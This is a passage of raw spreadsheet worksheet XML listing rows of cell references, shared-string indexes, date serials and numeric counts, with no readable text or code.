      </c>
      <c r="E610" s="95" t="s">
        <v>2082</v>
      </c>
      <c r="F610" s="42">
        <v>103</v>
      </c>
      <c r="G610" s="95" t="s">
        <v>2083</v>
      </c>
      <c r="H610" t="s">
        <v>2084</v>
      </c>
      <c r="I610" t="s">
        <v>185</v>
      </c>
      <c r="J610" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K610" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L610" t="s">
        <v>77</v>
      </c>
      <c r="M610" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q610" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="T610">
        <v>2622</v>
      </c>
      <c r="U610">
        <v>4318</v>
      </c>
      <c r="V610">
        <v>10034</v>
      </c>
      <c r="W610" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="611" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A611" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B611" s="52">
        <v>43663.590451458331</v>
      </c>
      <c r="C611" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D611" s="96">
        <v>133</v>
      </c>
      <c r="E611" s="95" t="s">
        <v>2086</v>
      </c>
      <c r="F611" s="42">
        <v>104</v>
      </c>
      <c r="G611" s="95" t="s">
        <v>2087</v>
      </c>
      <c r="H611" t="s">
        <v>2088</v>
      </c>
      <c r="I611" t="s">
        <v>185</v>
      </c>
      <c r="J611" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K611" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L611" t="s">
        <v>77</v>
      </c>
      <c r="M611" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q611" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R611">
        <v>6606</v>
      </c>
      <c r="S611">
        <v>7026</v>
      </c>
      <c r="T611">
        <v>190904</v>
      </c>
      <c r="U611">
        <v>220353</v>
      </c>
      <c r="V611">
        <v>175531</v>
      </c>
      <c r="W611" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="612" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A612" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B612" s="52">
        <v>43641.685261724539</v>
      </c>
      <c r="C612" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D612" s="96">
        <v>133</v>
      </c>
      <c r="E612" s="95" t="s">
        <v>2089</v>
      </c>
      <c r="F612" s="42">
        <v>100</v>
      </c>
      <c r="G612" s="95" t="s">
        <v>2090</v>
      </c>
      <c r="H612" t="s">
        <v>2091</v>
      </c>
      <c r="I612" t="s">
        <v>185</v>
      </c>
      <c r="J612" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K612" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L612" t="s">
        <v>77</v>
      </c>
      <c r="M612" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q612" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="U612">
        <v>3</v>
      </c>
      <c r="V612">
        <v>6344</v>
      </c>
      <c r="W612" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="613" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A613" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B613" s="52">
        <v>43571.42952730324</v>
      </c>
      <c r="C613" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D613" s="96">
        <v>133</v>
      </c>
      <c r="E613" s="95" t="s">
        <v>2092</v>
      </c>
      <c r="F613" s="42">
        <v>103</v>
      </c>
      <c r="G613" s="95" t="s">
        <v>2093</v>
      </c>
      <c r="H613" t="s">
        <v>2094</v>
      </c>
      <c r="I613" t="s">
        <v>185</v>
      </c>
      <c r="J613" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K613" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L613" t="s">
        <v>77</v>
      </c>
      <c r="M613" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q613" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R613">
        <v>201067</v>
      </c>
      <c r="S613">
        <v>196888</v>
      </c>
      <c r="T613">
        <v>3711424</v>
      </c>
      <c r="U613">
        <v>5769894</v>
      </c>
      <c r="V613">
        <v>7026761</v>
      </c>
      <c r="W613" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="614" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A614" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B614" s="52">
        <v>43641.685261736115</v>
      </c>
      <c r="C614" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D614" s="96">
        <v>133</v>
      </c>
      <c r="E614" s="95" t="s">
        <v>2095</v>
      </c>
      <c r="F614" s="42">
        <v>100</v>
      </c>
      <c r="G614" s="95" t="s">
        <v>2096</v>
      </c>
      <c r="H614" t="s">
        <v>2097</v>
      </c>
      <c r="I614" t="s">
        <v>185</v>
      </c>
      <c r="J614" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K614" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L614" t="s">
        <v>77</v>
      </c>
      <c r="M614" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q614" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="T614">
        <v>2621</v>
      </c>
      <c r="U614">
        <v>4316</v>
      </c>
      <c r="V614">
        <v>4464</v>
      </c>
      <c r="W614" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="615" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A615" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B615" s="52">
        <v>43571.429527349537</v>
      </c>
      <c r="C615" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D615" s="96">
        <v>133</v>
      </c>
      <c r="E615" s="95" t="s">
        <v>2098</v>
      </c>
      <c r="F615" s="42">
        <v>103</v>
      </c>
      <c r="G615" s="95" t="s">
        <v>2099</v>
      </c>
      <c r="H615" t="s">
        <v>2100</v>
      </c>
      <c r="I615" t="s">
        <v>185</v>
      </c>
      <c r="J615" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K615" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L615" t="s">
        <v>77</v>
      </c>
      <c r="M615" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q615" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R615">
        <v>187473</v>
      </c>
      <c r="S615">
        <v>189931</v>
      </c>
      <c r="T615">
        <v>6174955</v>
      </c>
      <c r="U615">
        <v>7567660</v>
      </c>
      <c r="V615">
        <v>9331304</v>
      </c>
      <c r="W615" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="616" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A616" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B616" s="52">
        <v>43663.590451469907</v>
      </c>
      <c r="C616" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D616" s="96">
        <v>133</v>
      </c>
      <c r="E616" s="95" t="s">
        <v>2101</v>
      </c>
      <c r="F616" s="42">
        <v>103</v>
      </c>
      <c r="G616" s="95" t="s">
        <v>2102</v>
      </c>
      <c r="H616" t="s">
        <v>2103</v>
      </c>
      <c r="I616" t="s">
        <v>185</v>
      </c>
      <c r="J616" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K616" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L616" t="s">
        <v>77</v>
      </c>
      <c r="M616" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q616" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R616">
        <v>784</v>
      </c>
      <c r="S616">
        <v>769</v>
      </c>
      <c r="T616">
        <v>18118</v>
      </c>
      <c r="U616">
        <v>26509</v>
      </c>
      <c r="V616">
        <v>33871</v>
      </c>
      <c r="W616" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="617" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A617" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B617" s="52">
        <v>43664.501604895835</v>
      </c>
      <c r="C617" s="95" t="s">
        <v>2081</v>
      </c>
      <c r="D617" s="96">
        <v>133</v>
      </c>
      <c r="E617" s="95" t="s">
        <v>2104</v>
      </c>
      <c r="F617" s="42">
        <v>102</v>
      </c>
      <c r="G617" s="95" t="s">
        <v>2105</v>
      </c>
      <c r="H617" t="s">
        <v>2106</v>
      </c>
      <c r="I617" t="s">
        <v>185</v>
      </c>
      <c r="J617" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K617" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L617" t="s">
        <v>77</v>
      </c>
      <c r="M617" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q617" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R617">
        <v>10589</v>
      </c>
      <c r="S617">
        <v>11588</v>
      </c>
      <c r="T617">
        <v>320031</v>
      </c>
      <c r="U617">
        <v>571540</v>
      </c>
      <c r="V617">
        <v>547180</v>
      </c>
      <c r="W617" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="618" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A618" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B618" s="52">
        <v>44291.773793194443</v>
      </c>
      <c r="C618" s="95" t="s">
        <v>2107</v>
      </c>
      <c r="D618" s="96">
        <v>130</v>
      </c>
      <c r="E618" s="95" t="s">
        <v>2108</v>
      </c>
      <c r="F618" s="42">
        <v>112</v>
      </c>
      <c r="G618" s="95" t="s">
        <v>2109</v>
      </c>
      <c r="H618" t="s">
        <v>2110</v>
      </c>
      <c r="I618" t="s">
        <v>38</v>
      </c>
      <c r="J618" s="95" t="s">
        <v>38</v>
      </c>
      <c r="K618" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L618" t="s">
        <v>38</v>
      </c>
      <c r="M618" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N618" t="s">
        <v>38</v>
      </c>
      <c r="Q618" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R618">
        <v>196</v>
      </c>
      <c r="S618">
        <v>230</v>
      </c>
      <c r="T618">
        <v>4394</v>
      </c>
      <c r="U618">
        <v>8177</v>
      </c>
      <c r="V618">
        <v>14475</v>
      </c>
      <c r="W618" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="619" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A619" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B619" s="52">
        <v>44291.773793182867</v>
      </c>
      <c r="C619" s="95" t="s">
        <v>2107</v>
      </c>
      <c r="D619" s="96">
        <v>130</v>
      </c>
      <c r="E619" s="95" t="s">
        <v>2112</v>
      </c>
      <c r="F619" s="42">
        <v>113</v>
      </c>
      <c r="G619" s="95" t="s">
        <v>2113</v>
      </c>
      <c r="H619" t="s">
        <v>2114</v>
      </c>
      <c r="I619" t="s">
        <v>156</v>
      </c>
      <c r="J619" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K619" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L619" t="s">
        <v>77</v>
      </c>
      <c r="M619" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N619" t="s">
        <v>476</v>
      </c>
      <c r="Q619" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R619">
        <v>1625</v>
      </c>
      <c r="S619">
        <v>1640</v>
      </c>
      <c r="T619">
        <v>23994</v>
      </c>
      <c r="U619">
        <v>44735</v>
      </c>
      <c r="V619">
        <v>57316</v>
      </c>
      <c r="W619" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="620" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A620" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B620" s="52">
        <v>44405.875200196759</v>
      </c>
      <c r="C620" s="95" t="s">
        <v>2107</v>
      </c>
      <c r="D620" s="96">
        <v>130</v>
      </c>
      <c r="E620" s="95" t="s">
        <v>2115</v>
      </c>
      <c r="F620" s="42">
        <v>130</v>
      </c>
      <c r="G620" s="95" t="s">
        <v>2116</v>
      </c>
      <c r="H620" t="s">
        <v>2117</v>
      </c>
      <c r="I620" t="s">
        <v>156</v>
      </c>
      <c r="J620" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K620" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L620" t="s">
        <v>77</v>
      </c>
      <c r="M620" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N620" t="s">
        <v>476</v>
      </c>
      <c r="Q620" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R620">
        <v>8417</v>
      </c>
      <c r="S620">
        <v>8389</v>
      </c>
      <c r="T620">
        <v>131128</v>
      </c>
      <c r="U620">
        <v>244548</v>
      </c>
      <c r="V620">
        <v>292486</v>
      </c>
      <c r="W620" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="621" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A621" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B621" s="52">
        <v>43838.924898101854</v>
      </c>
      <c r="C621" s="95" t="s">
        <v>2118</v>
      </c>
      <c r="D621" s="96">
        <v>311</v>
      </c>
      <c r="E621" s="95" t="s">
        <v>2119</v>
      </c>
      <c r="F621" s="42">
        <v>101</v>
      </c>
      <c r="G621" s="95" t="s">
        <v>2120</v>
      </c>
      <c r="H621" t="s">
        <v>2121</v>
      </c>
      <c r="I621" t="s">
        <v>611</v>
      </c>
      <c r="J621" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K621" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L621" t="s">
        <v>77</v>
      </c>
      <c r="M621" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N621" t="s">
        <v>613</v>
      </c>
      <c r="O621" s="95" t="s">
        <v>2122</v>
      </c>
      <c r="P621" t="s">
        <v>612</v>
      </c>
      <c r="Q621" s="95" t="s">
        <v>2123</v>
      </c>
      <c r="R621">
        <v>5196</v>
      </c>
      <c r="S621">
        <v>9501</v>
      </c>
      <c r="T621">
        <v>376079</v>
      </c>
      <c r="U621">
        <v>759234</v>
      </c>
      <c r="V621">
        <v>741750</v>
      </c>
      <c r="W621" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="622" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A622" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B622" s="52">
        <v>43728.726477164353</v>
      </c>
      <c r="C622" s="95" t="s">
        <v>2118</v>
      </c>
      <c r="D622" s="96">
        <v>311</v>
      </c>
      <c r="E622" s="95" t="s">
        <v>2124</v>
      </c>
      <c r="F622" s="42">
        <v>100</v>
      </c>
      <c r="G622" s="95" t="s">
        <v>2125</v>
      </c>
      <c r="H622" t="s">
        <v>1074</v>
      </c>
      <c r="I622" t="s">
        <v>103</v>
      </c>
      <c r="J622" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K622" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L622" t="s">
        <v>83</v>
      </c>
      <c r="M622" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N622" t="s">
        <v>149</v>
      </c>
      <c r="O622" s="95" t="s">
        <v>1229</v>
      </c>
      <c r="P622" t="s">
        <v>812</v>
      </c>
      <c r="Q622" s="95" t="s">
        <v>2123</v>
      </c>
      <c r="R622">
        <v>2684</v>
      </c>
      <c r="S622">
        <v>2669</v>
      </c>
      <c r="T622">
        <v>44177</v>
      </c>
      <c r="U622">
        <v>71061</v>
      </c>
      <c r="V622">
        <v>80816</v>
      </c>
      <c r="W622" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="623" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A623" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B623" s="52">
        <v>43644.622735775461</v>
      </c>
      <c r="C623" s="95" t="s">
        <v>2126</v>
      </c>
      <c r="D623" s="96">
        <v>118</v>
      </c>
      <c r="E623" s="95" t="s">
        <v>2127</v>
      </c>
      <c r="F623" s="42">
        <v>103</v>
      </c>
      <c r="G623" s="95" t="s">
        <v>2128</v>
      </c>
      <c r="H623" t="s">
        <v>2129</v>
      </c>
      <c r="I623" t="s">
        <v>185</v>
      </c>
      <c r="J623" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K623" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L623" t="s">
        <v>77</v>
      </c>
      <c r="M623" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q623" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R623">
        <v>403</v>
      </c>
      <c r="S623">
        <v>359</v>
      </c>
      <c r="T623">
        <v>9090</v>
      </c>
      <c r="U623">
        <v>14490</v>
      </c>
      <c r="V623">
        <v>21238</v>
      </c>
      <c r="W623" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="624" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A624" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B624" s="52">
        <v>43663.666035624999</v>
      </c>
      <c r="C624" s="95" t="s">
        <v>2126</v>
      </c>
      <c r="D624" s="96">
        <v>118</v>
      </c>
      <c r="E624" s="95" t="s">
        <v>2130</v>
      </c>
      <c r="F624" s="42">
        <v>104</v>
      </c>
      <c r="G624" s="95" t="s">
        <v>2131</v>
      </c>
      <c r="H624" t="s">
        <v>2132</v>
      </c>
      <c r="I624" t="s">
        <v>185</v>
      </c>
      <c r="J624" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K624" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L624" t="s">
        <v>77</v>
      </c>
      <c r="M624" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q624" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R624">
        <v>931</v>
      </c>
      <c r="S624">
        <v>801</v>
      </c>
      <c r="T624">
        <v>5837</v>
      </c>
      <c r="U624">
        <v>9057</v>
      </c>
      <c r="V624">
        <v>9398</v>
      </c>
      <c r="W624" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="625" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A625" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B625" s="52">
        <v>43644.622735752317</v>
      </c>
      <c r="C625" s="95" t="s">
        <v>2126</v>
      </c>
      <c r="D625" s="96">
        <v>118</v>
      </c>
      <c r="E625" s="95" t="s">
        <v>2133</v>
      </c>
      <c r="F625" s="42">
        <v>103</v>
      </c>
      <c r="G625" s="95" t="s">
        <v>2134</v>
      </c>
      <c r="H625" t="s">
        <v>2135</v>
      </c>
      <c r="I625" t="s">
        <v>185</v>
      </c>
      <c r="J625" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K625" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L625" t="s">
        <v>77</v>
      </c>
      <c r="M625" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q625" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R625">
        <v>14335</v>
      </c>
      <c r="S625">
        <v>15679</v>
      </c>
      <c r="T625">
        <v>381637</v>
      </c>
      <c r="U625">
        <v>567324</v>
      </c>
      <c r="V625">
        <v>537299</v>
      </c>
      <c r="W625" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="626" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A626" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B626" s="52">
        <v>43644.622735763885</v>
      </c>
      <c r="C626" s="95" t="s">
        <v>2126</v>
      </c>
      <c r="D626" s="96">
        <v>118</v>
      </c>
      <c r="E626" s="95" t="s">
        <v>2136</v>
      </c>
      <c r="F626" s="42">
        <v>103</v>
      </c>
      <c r="G626" s="95" t="s">
        <v>2137</v>
      </c>
      <c r="H626" t="s">
        <v>2138</v>
      </c>
      <c r="I626" t="s">
        <v>185</v>
      </c>
      <c r="J626" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K626" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L626" t="s">
        <v>77</v>
      </c>
      <c r="M626" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q626" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R626">
        <v>7611</v>
      </c>
      <c r="S626">
        <v>7403</v>
      </c>
      <c r="T626">
        <v>164662</v>
      </c>
      <c r="U626">
        <v>204313</v>
      </c>
      <c r="V626">
        <v>226194</v>
      </c>
      <c r="W626" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="627" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A627" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B627" s="52">
        <v>43644.682801006944</v>
      </c>
      <c r="C627" s="95" t="s">
        <v>2126</v>
      </c>
      <c r="D627" s="96">
        <v>118</v>
      </c>
      <c r="E627" s="95" t="s">
        <v>2139</v>
      </c>
      <c r="F627" s="42">
        <v>105</v>
      </c>
      <c r="G627" s="95" t="s">
        <v>2140</v>
      </c>
      <c r="H627" t="s">
        <v>2141</v>
      </c>
      <c r="I627" t="s">
        <v>185</v>
      </c>
      <c r="J627" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K627" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L627" t="s">
        <v>77</v>
      </c>
      <c r="M627" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q627" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R627">
        <v>52041</v>
      </c>
      <c r="S627">
        <v>50097</v>
      </c>
      <c r="T627">
        <v>993268</v>
      </c>
      <c r="U627">
        <v>1465063</v>
      </c>
      <c r="V627">
        <v>1467430</v>
      </c>
      <c r="W627" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="628" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A628" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B628" s="52">
        <v>43763.442818055555</v>
      </c>
      <c r="C628" s="95" t="s">
        <v>2142</v>
      </c>
      <c r="D628" s="96">
        <v>101</v>
      </c>
      <c r="E628" s="95" t="s">
        <v>2143</v>
      </c>
      <c r="F628" s="42">
        <v>101</v>
      </c>
      <c r="G628" s="95" t="s">
        <v>1672</v>
      </c>
      <c r="H628" t="s">
        <v>2144</v>
      </c>
      <c r="I628" t="s">
        <v>31</v>
      </c>
      <c r="J628" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K628" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L628" t="s">
        <v>77</v>
      </c>
      <c r="M628" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N628" t="s">
        <v>263</v>
      </c>
      <c r="O628" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q628" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W628" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="629" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A629" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B629" s="52">
        <v>44078.847690104165</v>
      </c>
      <c r="C629" s="95" t="s">
        <v>2142</v>
      </c>
      <c r="D629" s="96">
        <v>111</v>
      </c>
      <c r="E629" s="95" t="s">
        <v>2143</v>
      </c>
      <c r="F629" s="42">
        <v>111</v>
      </c>
      <c r="G629" s="95" t="s">
        <v>1669</v>
      </c>
      <c r="H629" t="s">
        <v>2144</v>
      </c>
      <c r="I629" t="s">
        <v>31</v>
      </c>
      <c r="J629" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K629" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L629" t="s">
        <v>77</v>
      </c>
      <c r="M629" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N629" t="s">
        <v>263</v>
      </c>
      <c r="Q629" s="95" t="s">
        <v>2145</v>
      </c>
      <c r="R629">
        <v>40529</v>
      </c>
      <c r="S629">
        <v>48944</v>
      </c>
      <c r="T629">
        <v>526150</v>
      </c>
      <c r="U629">
        <v>973026</v>
      </c>
      <c r="V629">
        <v>1507346</v>
      </c>
      <c r="W629" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="630" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A630" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B630" s="52">
        <v>44274.679742268519</v>
      </c>
      <c r="C630" s="95" t="s">
        <v>2142</v>
      </c>
      <c r="D630" s="96">
        <v>112</v>
      </c>
      <c r="E630" s="95" t="s">
        <v>2143</v>
      </c>
      <c r="F630" s="42">
        <v>112</v>
      </c>
      <c r="G630" s="95" t="s">
        <v>1669</v>
      </c>
      <c r="H630" t="s">
        <v>2144</v>
      </c>
      <c r="I630" t="s">
        <v>31</v>
      </c>
      <c r="J630" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K630" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L630" t="s">
        <v>77</v>
      </c>
      <c r="M630" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N630" t="s">
        <v>263</v>
      </c>
      <c r="Q630" s="95" t="s">
        <v>2146</v>
      </c>
      <c r="R630">
        <v>83189</v>
      </c>
      <c r="S630">
        <v>86211</v>
      </c>
      <c r="T630">
        <v>67132</v>
      </c>
      <c r="U630">
        <v>77246</v>
      </c>
      <c r="V630">
        <v>106431</v>
      </c>
      <c r="W630" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="631" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A631" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B631" s="52">
        <v>43776.697613124998</v>
      </c>
      <c r="C631" s="95" t="s">
        <v>2147</v>
      </c>
      <c r="D631" s="96">
        <v>103</v>
      </c>
      <c r="E631" s="95" t="s">
        <v>2148</v>
      </c>
      <c r="F631" s="42">
        <v>103</v>
      </c>
      <c r="G631" s="95" t="s">
        <v>2149</v>
      </c>
      <c r="H631" t="s">
        <v>2150</v>
      </c>
      <c r="I631" t="s">
        <v>156</v>
      </c>
      <c r="J631" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K631" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L631" t="s">
        <v>77</v>
      </c>
      <c r="M631" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N631" t="s">
        <v>476</v>
      </c>
      <c r="Q631" s="95" t="s">
        <v>2151</v>
      </c>
      <c r="R631">
        <v>47672</v>
      </c>
      <c r="S631">
        <v>45731</v>
      </c>
      <c r="T631">
        <v>841878</v>
      </c>
      <c r="U631">
        <v>1568125</v>
      </c>
      <c r="V631">
        <v>1628618</v>
      </c>
      <c r="W631" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="632" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A632" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B632" s="52">
        <v>43791.179654837964</v>
      </c>
      <c r="C632" s="95" t="s">
        <v>2152</v>
      </c>
      <c r="D632" s="96">
        <v>110</v>
      </c>
      <c r="E632" s="95" t="s">
        <v>2153</v>
      </c>
      <c r="F632" s="42">
        <v>110</v>
      </c>
      <c r="G632" s="95" t="s">
        <v>2154</v>
      </c>
      <c r="H632" t="s">
        <v>2155</v>
      </c>
      <c r="I632" t="s">
        <v>156</v>
      </c>
      <c r="J632" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K632" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L632" t="s">
        <v>77</v>
      </c>
      <c r="M632" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N632" t="s">
        <v>476</v>
      </c>
      <c r="Q632" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R632">
        <v>8154</v>
      </c>
      <c r="S632">
        <v>7637</v>
      </c>
      <c r="T632">
        <v>122095</v>
      </c>
      <c r="U632">
        <v>203064</v>
      </c>
      <c r="V632">
        <v>226212</v>
      </c>
      <c r="W632" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="633" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A633" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B633" s="52">
        <v>43893.137950798613</v>
      </c>
      <c r="C633" s="95" t="s">
        <v>2156</v>
      </c>
      <c r="D633" s="96">
        <v>111</v>
      </c>
      <c r="E633" s="95" t="s">
        <v>2157</v>
      </c>
      <c r="F633" s="42">
        <v>111</v>
      </c>
      <c r="G633" s="95" t="s">
        <v>2158</v>
      </c>
      <c r="H633" t="s">
        <v>2159</v>
      </c>
      <c r="I633" t="s">
        <v>156</v>
      </c>
      <c r="J633" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K633" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L633" t="s">
        <v>77</v>
      </c>
      <c r="M633" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N633" t="s">
        <v>476</v>
      </c>
      <c r="Q633" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R633">
        <v>2901</v>
      </c>
      <c r="S633">
        <v>2813</v>
      </c>
      <c r="T633">
        <v>45338</v>
      </c>
      <c r="U633">
        <v>82349</v>
      </c>
      <c r="V633">
        <v>100872</v>
      </c>
      <c r="W633" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="634" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A634" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B634" s="52">
        <v>43663.644034953701</v>
      </c>
      <c r="C634" s="95" t="s">
        <v>2160</v>
      </c>
      <c r="D634" s="96">
        <v>103</v>
      </c>
      <c r="E634" s="95" t="s">
        <v>2161</v>
      </c>
      <c r="F634" s="42">
        <v>102</v>
      </c>
      <c r="G634" s="95" t="s">
        <v>2162</v>
      </c>
      <c r="H634" t="s">
        <v>2163</v>
      </c>
      <c r="I634" t="s">
        <v>185</v>
      </c>
      <c r="J634" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K634" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L634" t="s">
        <v>77</v>
      </c>
      <c r="M634" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q634" s="95" t="s">
        <v>2085</v>
      </c>
